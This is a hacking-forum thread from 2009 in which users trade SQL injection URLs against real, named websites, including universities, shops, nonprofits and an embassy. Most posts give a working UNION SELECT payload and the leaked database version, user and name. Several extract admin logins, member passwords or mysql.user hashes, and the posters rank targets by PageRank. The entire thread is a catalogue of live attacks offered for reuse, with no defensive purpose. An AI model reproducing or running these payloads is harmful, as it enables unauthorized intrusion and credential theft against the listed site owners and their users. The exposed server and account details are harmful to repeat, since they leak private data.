http://testuser.artkatalog.net/WORK.php?ID=-1+union+select+concat_ws(0x3a,database(),version() ,user())--
http://zkb.wxc.edu.cn/new/work.php?id=-2+union+select+1,2,aes_decrypt(aes_encrypt(concat( database(),0x3a,version(),0x3a,user()),1),1),4,5,6 ,7,8--
pelligrim
03.07.2009, 09:37
http://www.paintballxxl.com/news_view.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),da tabase(),user()),6--
4.1.25-log:db00077859:00077859@localhost
HAXTA4OK
03.07.2009, 10:37
http://www.li.cj.edu.ro/index.php?pagina=activitati&activitate=zilele2008&cat=detalii&id=-1+union+select+1,concat_ws(0x3a,user(),version(),d atabase()),3,4,5,6--
gabi@localhost:5.0.67-0ubuntu6:licinfo
mysql.user is there
http://www.li.cj.edu.ro/index.php?pagina=activitati&activitate=zilele2008&cat=detalii&id=-1+union+select+1,group_concat(concat_ws(0x3a,user, password,file_priv)),3,4,5,6+from+mysql.user--
the password can be decrypted)))
mailbrush
03.07.2009, 19:19
http://www.backwoodsbeachparty.com/revphp/rev.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,user(),datab ase(),version()),6,7,8,9,10,11beach_reviews@localh ost:beach_reviews:5.0.81-community
PR 7
http://www.la.unm.edu/~bjudd/PHPMySQL/LA_dining/rest.php?id=-1+union+select+1,concat_ws(0x3a,database(),version (),user()),3,4,5,6,7--
LAdining:4.1.20:webuser@localhost
---
http://www.umeko.co.jp/work.php?id=-1+union+select+1,concat_ws(0x3a,database(),version (),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34, 35,36--
http://www.mv-web.nl/work.php?id=-1+union+select+concat_ws(0x3a,database(),version() ,user())--
http://www.altstudio.be/work.php?pg=2&id=-1+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,data base(),version(),user()),10,11,12--
http://www.jacquesbedel.com/work.php?s=-1+union+select+concat_ws(0x3a,database(),version() ,user())--
PR - 4
http://www.planet-rock.com/news.php?id=-110+union+select+1,2,3,4,5,6,concat_ws(0x3a,databa se(),version(),user()),8,9,10--
Database Version: 5.0.67-log
PR - 5
http://www.daiky.net/main.php?page=articles&aid=-1+union+select+1,2,3,4,5,concat_ws(0x3a,database() ,version(),user()),7--&type=brit
Database Version: 4.0.27-standard
DezMond™
03.07.2009, 21:15
http://pribor-m.ru/main.php?show=a_ob&action=view&id=-110'+union+select+1,2,version(),4,5,6,7,8,9+/*+
4.0.27
http://belmilk.com/menu.php?id=-4+union+select+1,group_concat(table_name),3,4,5,6, 7,8,9+from+information_schema.tables+/*+
http://www.sushi-house.ru/menu.php?id=-4+UnIon+SeLect+1,2,version(),4,5,6,7,8,9,10,11,12, 13+/*+
4.1.22
http://www.bonappetit.net.ru/menu.php?ID=-0+union+select+1,2,version(),4,5,6,7,8+/*+
http://www.wheatmontana.com/deli-menu.php?id=-6'+UnIon+SeLect+1,2,3,version(),5,6,7+--+
http://wotlk.atricom.ru/index.php?news=-1'+UNION+SELECT+1,concat_ws(0x0b,@@version_compile _os,version()),3,4,5,6--+
pc-linux-gnu
5.0.51a
http://www.prestonredman.co.uk/ourservices.php?id=-6+union+select+1,2,3,4,5,6,7,8
4.1.21-community-nt
http://www.legalrecruitment.co.uk/index.php?id=-63+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14
4.0.27-standard-log
http://www.pro-projector.ru/main.php?production=-1453+union+select+1,concat_ws(0x3a,database(),vers ion(),user()),3,4,5,6,7,8,9,10--&cat=4
Database Version: 5.0.75-log
P.S. See the title)
HAXTA4OK
04.07.2009, 10:48
PR: 5
http://www.dr-schutz-russia.com/index.php?view=product&id=-1+union+select+1,2,3,concat_ws(0x3a,user(),version (),database()),5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24--
dbu1106461@localhost:5.0.32-Debian_7etch10-log:db1106461-russia
#####################################
TIC: 200
PR: 4
http://www.zoddom.ru/priview.php?id=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2,3,4,5,6,7,8--&t=dr
h_zoddom_ru@localhost:zoddom_ru:4.1.22-log
####################################
http://www.droidrunner.com/index.php?ID=1&page=A&go=up&forum=DR&index=5+and+substring(version(),1,1)=5--
[PR 4]
http://www.mondorecords.com/shop.php?id=-433+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,ve rsion(),database(),user()),10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35,36,37
4.0.27-standard:db124719782:dbo124719782@localhost
===============
[PR 4]
http://www.hitchedmag.com/article.php?id=-526+union+select+1,2,3,4,concat_ws(0x3a,version(), database(),user()),6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35,36,37,38,39,40,41,42,43,44
5.0.51a-log:hitchedm_hitched:hitchedm_test@boscgi1202.eigb ox.net
===============
[PR 3]
http://ingrus.net/york/details.php?id=-190+union+select+concat_ws(0x3a,0x3c2f7469746c653e ,version(),database(),user())
4.1.22:db_ingrus_5:dbu_ingrus_1@192.168.7.4
M.W.N.N.
05.07.2009, 07:53
http://romanceratings.com/review.php?id=11+union+select+1,2,3,4,concat_ws%28 0x3a,version%28%29,database%28%29,user%28%29%29,6, 7,8,9+from+information_schema.columns+limit+1,1
version():5.0.51a-24+lenny1-log
database():romanceratings
user():romanceratings@localhost
Table_schema,Table_name,Column_name
PR 5
http://www.bluedoor.com.cn/bluedoor/work.php?id=1+union+select+concat_ws(0x3a,database (),version(),user())--
Output is in the embed tag
---
PR 5
http://www.moehlin.ch/new.php?&id=1&news_id=-472+union+select+1,2,3,concat_ws(0x3a,database(),v ersion(),user()),5,6--
---
PR 4
http://www.arquimea.com/sections/work.php?id=99999999+union+select+1,2,3,4,concat_w s(0x3a,database(),version(),user()),6,7--
Doggies =)
http://www.veorkf.ru/catalog/dog.php?id=-5338+union+select+concat_ws(0x3a,database(),versio n(),user())--
http://www.movingafghans.com/dog.php?id=-26+union+select+1,2,3,concat_ws(0x3a,database(),ve rsion(),user()),5,6--
http://www.kemosabeterriers.com/dog.php?id=12+union+select+1,concat_ws(0x3a,databa se(),version(),user()),3--
http://www.akitas.gr/english/dog.php?id=-281+union+select+1,2,concat_ws(0x3a,database(),ver sion(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50, 51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67 ,68--
http://www.bradstar.co.uk/dog.php?id=-24+union+select+1,2,concat_ws(0x3a,database(),vers ion(),user()),4,5--
http://www.panoniantrain.net/strane/dog.php?id=-6+union+select+1,concat_ws(0x3a,database(),version (),user()),3,4,5,6,7,8,9,10,11--
http://www.fenerbahce.ro/haber_detay.php?id=-173+UNION+SELECT+1,concat_ws(0x3a,version(),databa se(),user(),@@version_compile_os),3,4,5,6,7,8
Database Version: 4.1.22-max
Database name: fener_fenerbahcebd
User name: fener_fener@localhost
Os: unknown-linux-gnu
beerhack
05.07.2009, 14:10
PR 5
http://matematicas.uniandes.edu.co/summer2007/index.php?Id=-1+union+select+1,version(),3,4,5,6,7,8,9,0/*
Database Version: 5.0.45
Database name: WebMath
User name: ma73ma71ca2@localhost
[PR:2]
db info:
http://petri.ru/products.php?product=-62+union+select+1,concat_ws(':',version(),user(),d atabase()),null
5.0.30-Debian_1-log:z71188_dbase@77.221.130.5:z71188_dbase
tables:
http://petri.ru/products.php?product=-62+union+select+1,2,group_concat(0x0b,table_name)+ from+information_schema.tables+group+by+table_sche ma+limit+1,1
PR - 3
http://www.inbi.ru/index.php?newsmore=-1870+union+select+1,2,3,concat_ws(0x3a,database (),version(),user()),5--
Database Version: 5.0.75-community-log
DezMond™
05.07.2009, 18:11
PR5
http://www.bonobomusic.com/bonobo/releases.php?release=-1512+union+select+1,2,table_name,4,5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21+from+information_sc hema.tables+limit+145,1000+/*+
http://www.ajvengo.ru/menu.php?gid=-00000321+union+select+1,2+/*+&id=00001208
http://www.hatton-arms.co.uk/restaurant-menu.php?id=-7'+union+select+1,2,concat_ws(0x3a3a,username,pass word,access_level),4,5,6,7,8,9,10+from+users+where +access_level=1+--+
http://www.edohana.com/menu.php?id=-12+union+select+1,pass+from+member+--+
http://www.teatrprod.by/menu.php?id=-222+union+select+1,concat_ws(0x3a3a,user_id,user_c ompany,user_name,user_email,group_id),3,4,5,6,7,8, 9+from+users+/*+
db info:
http://tmck.kz/company/news/?cid=0&rid=-545'+union+select+1,2,3,4,concat_ws(':',version(), user(),database())--+
5.0.30-Debian_1-log : z72124_tmsite@77.221.130.5 : z72124_tmsite
tables:
http://tmck.kz/company/news/?cid=0&rid=-545'+union+select+1,2,3,4,group_concat(0x0a,table_ name)+from+information_schema.tables+group+by+tabl e_schema+limit+1,1--+
_faq, _kats, _photo, _users, _cache, _voute, _files, _links, _prod, _category, _voute_ip, _gb, _news, _razm_trub, _access, _comment, _zamki, _kat_cfg, _page, _sprav, _atribut, _comment_cfg, shopping
5.0.45-log: :mangos@localhost:unknown-freebsd7.0:characters
http://wow.bpnet.ru/gilds.php?guid=-1/**/UNION/**/SELECT/**/1,concat_ws(0x3a,version(),user(),@@version_compil e_os,database()),3,4,5,6,7,8,9,10,11,12/*
5.0.45-community-nt:mangos@localhost:Win32:characters
http://pavjek.no-ip.info/gilds.php?guid=-1/**/UNION/**/SELECT/**/1,concat_ws(0x3a,version(),user(),@@version_compil e_os,database()),3,4,5,6,7,8,9,10,11,12/*
Skofield
05.07.2009, 22:38
PR 5
http://www.genevainternational.org/navigate.php?kind=1&id=1397&lang=en&last=99&lastsub=-280+union+select+1,group_concat(0x3a,version(),dat abase(),user()),3+/*
5.0.32-Debian_7etch8-log : geinternational : gvainternational@192.168.3.110
HAXTA4OK
05.07.2009, 23:26
http://hj-co.com/series.php?ID=-1+union+select+1,concat_ws(0x3a,user(),version(),d atabase()),3,4,5--
hjcocom_power@localhost:4.1.22-standard:hjcocom_power
####################################
PR: 6
http://www.iranculture.org/commission/hj/Index.php?ID=1+and+substring(version(),1,1)=3/*
Iranian culture +)
#####################################
something about football
http://www.warkaus-jk.com/selostus.php?id=-1+union+select+1,concat_Ws(0x3a,version(),database (),user()),3--
4.0.25:db_wjk:vkjanot@localhost
[PR 6]
http://www.newsletteraccess.com/display_article.php?id=-8997+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,3 1,concat_ws(0x3a,version(),database(),user()),33,3 4,35,36,37,38,39,40,41,42,43,44--
4.0.20-standard:newsletters:newsletteraccess@localhost
===============
[PR 6]
http://www.baruch.cuny.edu/bpac/calendar/event.php?id=-410+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,vers ion(),database(),user()),9--
4.0.16-standard:bpac:bpac@localhost
===============
[PR 4]
http://www.wbstraining.com/php/events/showevent.php?id=-150+union+select+1,2,3,4,5,6,concat_ws(0x3a,versio n(),database(),user()),8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23
5.0.45:wbs:lomokev@server213-171-218-189.livedns.org.uk
beerhack
06.07.2009, 01:26
PR 5
http://www.clubselecta.com.co/establecimientos.php?id=-1+union+select+1,concat_ws(0x3a,user,password)+fro m+mysql.user+limit+0,1/*
Database Version: 4.0.31
Database name: club_selecta
User name: elpais@localhost
M.W.N.N.
06.07.2009, 03:08
http://akmentornis.com/forum.php?mid=175+union+select+1,concat_ws%280x3a, version%28%29,database%28%29,user%28%29%29,3,4,5,6 ,7,8,9,10,11,12+limit+1,1/*
version():4.0.27-max-log
database():tehnomag_tmag
user():tehnomag_tmag@v3.valuehost.ru
Skofield
06.07.2009, 14:39
PR 5
http://www.meddb.info/index.php.en?cat=-4+union+select+1,2,version(),4/*
Database Version: 5.0.27-standard-log
Database name: med_db
User name: koenjo1@localhost
-----------------------------------------------------------------------------------------------------------------
PR 5
http://www.pathology.med.umich.edu/policies/index.php?id=-209'+union+select+1,concat_ws(0x3a,user,password), 3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, 22,23,24,25+from+mysql.user/*
Database Version: 4.0.27-nt
Database name: pathology
User name: root@www.pathology.med.umich.edu
http://www.bufferbear.co.uk/listNursery.php?id=-40+union+select+1,2,coNCAT_ws(chAR(42,32,42),user( ),database(),version()),4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18
salarysacrifice@localhost* *salarysacrifice* *4.0.21-standard
Skofield
06.07.2009, 17:47
PR 5
http://www.plus2net.com/php_tutorial/php_blog_dtl.php?id=-3+union+select+1,2,version(),4--
Database Version: 5.1.30
Database name: syamalav_plus2net
User name: syamalav_plus@localhost
http://www.gaiahouse.co.uk/pages.php?id=-3+union+select+1,2,3,version(),5,6
4.1.22-standard-log
[PR 5]
http://osa.nccu.edu.tw/en/modules/tinyd9/content/index.php?id=1&anno_ID=-92+union+select+1,2,3,4,5,6,7,8,9,unhex(hex(concat _ws(0x3a,version(),database(),user()))),11
4.1.11:studaff:reid@localhost
http://osa.nccu.edu.tw/en/modules/tinyd9/content/index.php?id=1&anno_ID=-92+union+select+1,2,3,4,5,6,7,8,9,unhex(hex(concat _ws(0x3a,user,password,file_priv))),11+from+mysql. user
http://www.tangodiva.com/index.php?page=features&j=1&cat=3&story_id=591+union+select+concat_ws(0x3a,version() ,database(),user())+limit+1,1--
5.0.45:tangodiv tangodiva:tangodiv@localhost
http://www.tangodiva.com/index.php?page=features&j=1&cat=3&story_id=591+limit+0+UNION+SELECT+CONCAT(id,userna me,password)+FROM+alpha.divas+LIMIT+1,1--
beerhack
07.07.2009, 12:08
PR 5
https://students.washington.edu/shpe/officers.php?id=-1+union+select+1,version(),3,4,5,6,7/*
Database Version: 5.0.27-standard
Database name: users
User name: root@students01.u.washington.edu
http://students.washington.edu/wwuf/calendar/cal_cat.php?op=cat&id=-1'+union+select+1,2,3,4,5,6,7,8,9,0,11,concat_ws(0 x3a,user,password),13,14,15,16,17,18+from+mysql.us er/*
http://www.affordablewine.co.uk/store.php?cat=3+limit+0+UNION+SELECT+1,CONCAT(Data base(),User(),Version()),3,4,5,6,7,8,9--
5.0.82-communityweb229-affordweb229-afford@localhost
http://www.xl-portal.ro/?x=stire&id=-1+UNION+SELECT+1,2,concat_ws(0x3a,version(),databa se(),user(),@@version_compile_os),4,5,6--
Database Version: 5.0.67-community-log
Database name: aikowebd_xlportal
User name: aikowebd_xlporta@193.223.101.236
Os: redhat-linux-gnu
http://www.wyevalleybrewery.co.uk/news_view.php?id=-176+union+select+1,group_concat(table_name),3,4,5+ from+information_schema.tables
http://www.alpenstock.co.uk/tents.php?id=-1+union+select+1,group_concat(table_name),3,4,5,6, 7,8+from+information_schema.tables
pelligrim
07.07.2009, 14:59
http://gerpes.com.ua/bolezni/?id=-1+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5,6,7--
4.0.27-standard-log:gerpeso_gerpes:gerpeso_gerpes@localhost
http://prasu.com.ua/index.php?id=1+union+select+1,2,3,concat_ws(0x3a,v ersion(),database(),user())--
5.1.30:db_prasu:admin_prasu@localhost
PR 4
http://www.tradevoyage.by/new.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,database(),v ersion(),user()),6,7,8,0,10--
tradevoyageby_tradevoyage:5.1.34-community-log:tradevoyageby@localhost
PR 4
http://www.ouimagazine.net/carnet/new.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,database(),v ersion(),user()),6,7,8,9--
gilles:5.0.32-Debian_7etch10-log:gilles@localhost
----------
http://www.nnasos.ru/new.php?id=-1+union+select+1,2,concat_ws(0x3a,database(),versi on(),user()),4--
http://www.konevps.ru/new.php?id=-1+union+select+1,concat_ws(0x3a,database(),version (),user()),3--
http://sp-homelighting.com/new.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,database(),v ersion(),user())--
http://www.cirsainteractive.com/html/new.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,database() ,version(),user()),7--
Skofield
07.07.2009, 16:15
http://www.teethwhiteningreviews.com/item.php?id=-7+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5,6,7,8,9,10,11,12,13/*
5.0.45:teethwh_mydb:teethwh_mydb@localhost
-------------------------------------------------------------------------------------------------------------------------
http://www.wallawallacountydemocrats.org/modules/newsletters/simpleview.php?id=-150+union+select+1,2,3,4,version(),6,7,8,9,0,11,12 ,13,14,15,16,17,18+from+users/*
Database Version: 5.0.45-Debian_1ubuntu3.3-log
Database name: wallawallacountydemocrats
User name: wallawalla@172.16.0.179
[PR 6]
http://www.smap.eu/EN/index.php?page=home2.php&id=-803+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a, version(),database(),user()),11,12,13,14,155.0.45: smap_db:smap_db_user@localhost
==================
[PR 3]
http://www.unlocknews.eu/index.php?id=-8+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17--4.1.22:unlocknews:unlocknews@localhost
Skofield
08.07.2009, 12:17
PR 5
http://www.pcgg.de/workshop_detail.php?id=-87+union+select+1,2,3,4,unhex(hex(version())),6,7, 8,9,10,11,12/*
Database Version: 5.0.18
Database name: usr_web234_1
User name: web234@localhost
beerhack
08.07.2009, 14:38
http://www.ipservice.com.co/faqingb.php?id=-1+union+select+1,version(),3,4,5/*
Database Version: 4.1.22-standard
Database name: ipservic_adminfaq
User name: ipservic_admin@localhost
Skofield
08.07.2009, 14:52
http://www.globalspeakers.com.au/viewspeaker.php?id=-434+union+select+1,2,version(),4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25+from+admi n/*
Database Version: 5.0.22-log
Database name: c893_global
User name: C893_glb@203.16.60.230
-----------------------------------------------------------------------------------------------------------------
http://www.bouncy-castles-for-hire.co.uk/bouncy-castle-hire.php?id=-75+union+select+1,version()--
Database Version: 5.0.82-community
Database name: web33-bouncy
User name: web33-bouncy@localhost
beerhack
08.07.2009, 16:42
http://www.wrekin-shell-mouldings.co.uk/certification.php?id=1+union+select+1,2,3,concat_w s(0x3a,user_id,user_email,user_password),5,6,7,8,9 ,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 ,27,28,29,30,31+from+users/*
Database Version: 4.1.22-log
Database name: wsmdb
User name: wsmuser@localhost
PR 6
http://www.greenday.com/article.php?id=-333+union+select+1,2,3,4,concat_ws(0x3a,database() ,version(),user()),6--
greensite:5.0.45:greensite@localhost
users:
http://www.greenday.com/article.php?id=-333+union+select+1,2,333,444,column_name,6+from+in formation_schema.columns+where+table_name=0x757365 7273+limit+1,1+--
couldn't find the admin panel :(
http://www.motormania.hr/index.php?forwardUrl=subcategory.php&id=-1935+union+select+111,2,3/*
mmania_www@localhost:4.1.22-standard:mmania_www
The passwords didn't work anywhere anyway, which is why I posted it.
kisses to all
mr.gr33n
08.07.2009, 23:23
http://www.alv-cr.cz/members.php?id=-24+union+select+1,concat(user,0x3a,pass),3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+fro m+users--
http://www.kuklachev.ru/show_article.php?page=articles&id=-16+union+select+1,concat(name,0x3a,member_login_ke y),3+from+fm_members+limit+1,1
P.S. Kuklachev's site xD
http://www.indiani.cz/web/articles.php?id=-52+union+select+1,concat(login,0x3a,heslo),3,4,5,6 ,7+from+admin--
http://www.flightsim.cz/article.php?id=-53+union+select+1,concat(fs01_username,0x3a,fs01_p wd),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+fs0 1_users--
mr.gr33n
08.07.2009, 23:41
A bit more
http://www.pshsoft.net/pshsoft/en/product.php?id=-10013+union+select+1,2,concat(username,0x3a,passwo rd),4,5,6,7,8,9,10,11,12,13,14,15+from+user
http://wap.relatio.ro/onews/cat.php?id=13++union+select+1,concat(username,0x3a ,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28+from+mos_users--
http://www.disa-international.com/news.php?id=-34+union+select+concat(username,0x3a,password),2,3 ,4+from+admins--
http://www.hageshii.org/pages/film.php?id=-33+union+select+1,concat(user_name,0x3a,user_pwd), 3,4,5,6,7,8,9+from+dc_user--
http://www.merchandisingf1.com/en/news.php?id=-34+union+select+1,2,3,concat(username_usr,0x3a,pas sword_usr),5,6,7,8,9+from+mll_users_usr--
http://webdevtips.co.uk/webdevtips/article.php?item=-63+union+select+1,concat(username,0x3a,user_passwo rd),3,4,5,6,7+from+phpbb_users+limit+1,1--
http://www.worksmart.org.uk/jargonbuster/index.php?id=-20+union+select+1,concat_ws(0x3a,version(),user(), database())--
4.1.20:worksmart@localhost:tuc
http://www.urolognadom.ru/index.php?id=-2+union+select+1,2,3,4,5,concat_ws(0x3a3a,version( ),user(),database()),7--
4.1.22::urologna@bix.rbc.ru::wwwurolognadomru_urol og
http://www.cbr-group.ru/index.php?id=-22+union+select+1,2,3,4,concat_ws(0x3a3a,version() ,user(),database()),6,7,8,9,10,11,12,13,14,15,16--
4.0.24_Debian-10sarge2-log::cbr-group@localhost::cbr-group
http://www.lj-data.dk/vare_soft.php?varenr='UNION+SELECT+1,2,concat_ws(0 x3a,USER(),DATABASE(),VERSION()),4,5,6,7,8,9'
ljdatadk@maggie.andersenit.dk:ljdatadk:5.0.51a-log
pelligrim
09.07.2009, 10:39
http://pyatoe.ru/info/articles/?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),data base(),user())--
4.1.22-log:pyatoer1_:pyatoer1_1@localhost
http://www.belembassy.org/moldova/index.php?id=3&d=articles&economic_id=-1+union+select+1,2,3,concat_ws(0x3a,version(),data base(),user())--
4.1.21:moldova:mfa@localhost
eurotrade.hr
a shop that distributes IT products :)
http://www.eurotrade.hr/eurotrade/cijenik.php?id=3&id1=-7+union+select+1,2,3/*
EUROTRA_DAVID@LOCALHOST:4.1.22:EUROTRA_EUROTRADE
/home/sites/www.eurotrade.hr/eurotrade/
..::TROYAN::..
09.07.2009, 14:06
http://www.mediastar.ru/news/?nid=-466+union+select+1,2,concat_ws(0x3a3a3a,user(),ver sion(),database()),4,5,6,7--
mediastar@172.16.2.12:::4.0.23a:::mediastar
pr:4
TIC:150
http://www.mydj.ru/?sid=-31224+union+select+1,2,3,4,concat_ws(0x3a,user(),d atabase(),version()),6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24--
mydj01@localhost:mydj01:5.0.45
http://www.mydj.ru/?sid=-31224+union+select+1,2,3,4,group_concat(table_name ),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3,24+from+information_schema.tables--
pr:2
TIC:180
mr.gr33n
09.07.2009, 19:11
http://www.pacesetterevents.com/news.php?id=-
65+union+select+1,concat(Name,0x3a,Password),3,4,5 ,6,7+from+pacesett_regdb.users--
http://www.cahcare.com/news.php?id=-65+union+select+1,concat(username,0x3a,passwd),3,4 ,5,6,7,8+from+cahcare_users+limit+5,1--
-------------------------
http://www.cahcare.com/admin/
-------------
http://www.logar.ru/index.php?act=top_list&id=-22+union+select+1,2,3,concat_ws(0x3a,version(),use r(),database()),5,6,7--
4.0.27-log:logar1815@pm2.zenon.net:logar1815
Krist_ALL
09.07.2009, 19:30
http://www.audioza.ru/audiobook.php?book_id=-66+union+select+1,2,3,4,5,6,count(*),8+from+admin
5th branch
PR 2, TIC 30
http://euroreviews.eu.funpic.de/bookdetails.php?book_id=-409+union+select+1,2,pass,4,5,6,7,8,9,10,11,12,13, 14,15,16,17,18+from+users
PR 3
beerhack
09.07.2009, 20:17
http://www.machinestudios.co.uk/viewentry.php?id=1+union+select+1,2,3,4,5,concat_w s(0x3a,username,password)+from+logins--
Database Version: 5.0.67-log
Database name: DB515306
User name: U515306@ripper.store
http://www.timefare.com/products.php?CAT=3+limit+0+UNION+SELECT+1,CONCAT(V ersion(),Database(),User()),3--
4.1.22-standard time_products time_web@localhost
http://www.imaginemason.org/home.php?ID=73+limit+0+UNION+SELECT+1,2,3,4,5,6,7, CONCAT(Version(),Database(),User()),9,10,11,12,13--
Database Version: 5.0.67-log
Database name: mason_data
User name: mason_user@209.173.135.197
mr.gr33n
09.07.2009, 21:05
http://www.gtbike.ru/news.php?id=-95+union+select+1,2,3,4,5,concat(username,0x3a,use r_password),7,8,9+from+gt_phpbb_users+limit+1,1--
=========
http://www.eurodownload.com/download-links.php?cat=3+union+select+CONCAT(Version(),Data base(),User())+limit+1,1--
Database Version: 5.0.45
Database name: eurodownload
User name: eurouser@localhost
http://www.eurodownload.com/download-links.php?cat=3+limit+0+UNION+SELECT+CONCAT((SELEC T+CONCAT(developers_login,developers_passwd)+FROM+ eurodownload.ed_developers+limit+1,1))--
No idea where to enter the login and pass there; if you find it, send it in a PM
Krist_ALL
09.07.2009, 23:15
http://www.arminfo.info/index.php?show=article&id=-15366+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21+from+articles 4th branch
http://www.vectorsjournal.org/index.php?page=7&projectId=-57+UNION+SELECT+concat_ws(0x3a,%20user(),%20databa se(),%20version()),2/*
in the title
http://www.terastudio.com/index.php?page=ar&n=-1854+UNION+SELECT+1,2,3,concat_ws(0x3C42523E,%20us er(),%20database(),%20version()),5,6,7,8,9,10,11,1 2+/*
beerhack
10.07.2009, 11:29
http://www.owv-hv.de/wanderwege/wanderwege.php?id=-1+union+select+1,concat_ws(0x3a,g_userName,g_hashe dPassword,g_email),3,4,5,6,7,8,9,0,11,12,13,14,15, 16,17+from+usr_web4_2.g1_User+limit+1,1/*
Database Version: 5.0.32-Debian_7etch8-log
Database name: usr_web4_1
User name: web4@localhost
http://www.bottegangeli.com/prod_details.php?prod_id=-1+union+select+1,2,3,4,5,6,concat(table_name,0x20, column_name,0x20,table_schema),8,9,10,11,12,13,14+ from+information_schema.columns
http://specialtylingerie.ca/lingerie.php?lsID=-1+union+select+1,2,3,4,version()
[PR 5]
http://www.guesthouses.be/template/kalender.php?id=-53+union+select+1,2,concat_ws(0x3a,version(),datab ase(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,5 1,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67, 68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84 ,85,86,87
5.0.22:guesthouses02:guesthouses@localhost
=====================
[PR 5]
http://www.zuidpool.be/kalender.php?ID=-32+union+select+1,2,concat_ws(0x3a,version(),datab ase(),user()),4,5,6,7--&productienaam=kReon
4.1.21-standard:zuidpool:zuidpool@localhost
=====================
[PR 4]
http://www.fsek.lth.se/old//kalender.php?id=-592+union+select+1,2,concat_ws(0x3a,version(),data base(),user()),4,5,6,7,8&month=-20
5.0.54-log:web:web@localhost
=====================
[PR 2]
http://www.bmcenter.be/kalender.php?ID=-99+union+select+1,2,3,concat_ws(0x3a,version(),dat abase(),user()),5
5.0.45-Dotdeb_0.dotdeb.1.1.CGA.1:bmcenter:admin@hostingst 504.isp.belgacom.be
http://www.bmcenter.be/kalender.php?ID=-99+union+select+1,2,3,concat_ws(0x3a,user,password ,file_priv),5+from+mysql.user
http://www.bmcenter.be/kalender.php?ID=-99+union+select+1,2,3,concat_ws(0x3a,user,pwd),5+f rom+user
=====================
[PR 1]
http://www.heidetravel.be/kalender.php?id=-14+union+select+concat_ws(0x3a,version(),database( ),user()),2
5.0.32-Debian_7etch10-log:heidetravel_be:heidetravel_be@srv74.one.com
=====================
[PR 1]
http://www.bockmans.se/kalender.php?id=-17+union+select+1,2,3,concat_ws(0x3a,version(),dat abase(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20
4.0.27-standard:easyinfo_k:easyinfo@dedi52.aname.net
=====================
[PR 0]
http://www.pluspunthw.nl/kalender.php?id=10+union+select+1,2,concat_ws(0x3a ,version(),database(),user())+limit+1,1
5.0.51a-24-log:leenb_ppunt:leenb_ppunta@wh-www15.xs4all.nl
http://www.mossberg.com/products/default.asp?id=1%20or%201=@@version--
Microsoft SQL Server 2005 - 9.00.2050.00 (Intel X86) Feb 13 2007 23:02:48 Copyright (c) 1988-2005 Microsoft Corporation Workgroup Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
Skofield
10.07.2009, 15:54
http://www.lifelinebatteries.com/marineflyer.php?id=-3+union+select+1,2,version(),4,5,6,7,8,9,0,11,12,1 3,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/*
Database Version: 5.0.45
Database name: batteries
User name: concorde_lynda@localhost
beerhack
10.07.2009, 16:20
PR 6
BLIND
https://www.calico.org/page.php?id=1'+and+substring(version(),1,1)=5/*
Krist_ALL
10.07.2009, 16:22
http://krasotaspb.ru/services/news/article.php?ID=-13236+union+select+1,2,3,4,5,6,login,8,9,password+ from+b_user+limit+105,1
Some kind of unfinished social network. PR 2. 5th branch.
About 2200 accounts
+++AndreyDevil+++
10.07.2009, 16:52
http://www.anca.org/press_releases/press_releases.php?prid=1541+and+substring(version (),1,1)=3
http://avtodeti.ru
A portal about children's road safety
http://avtodeti.ru/?t=-73+union+select+1,2,concat(login,char(58),password ),4,5,6,7,8,9,10,11+from+admin--
==========
http://avtodeti.ru/?t=-73+union+select+1,2,concat(memberName,char(58),pas swd,char(58),passwordSalt,char(58),emailAddress),4 ,5,6,7,8,9,10,11+from+smf_members+limit+0,1--
beerhack
10.07.2009, 17:54
PR 5
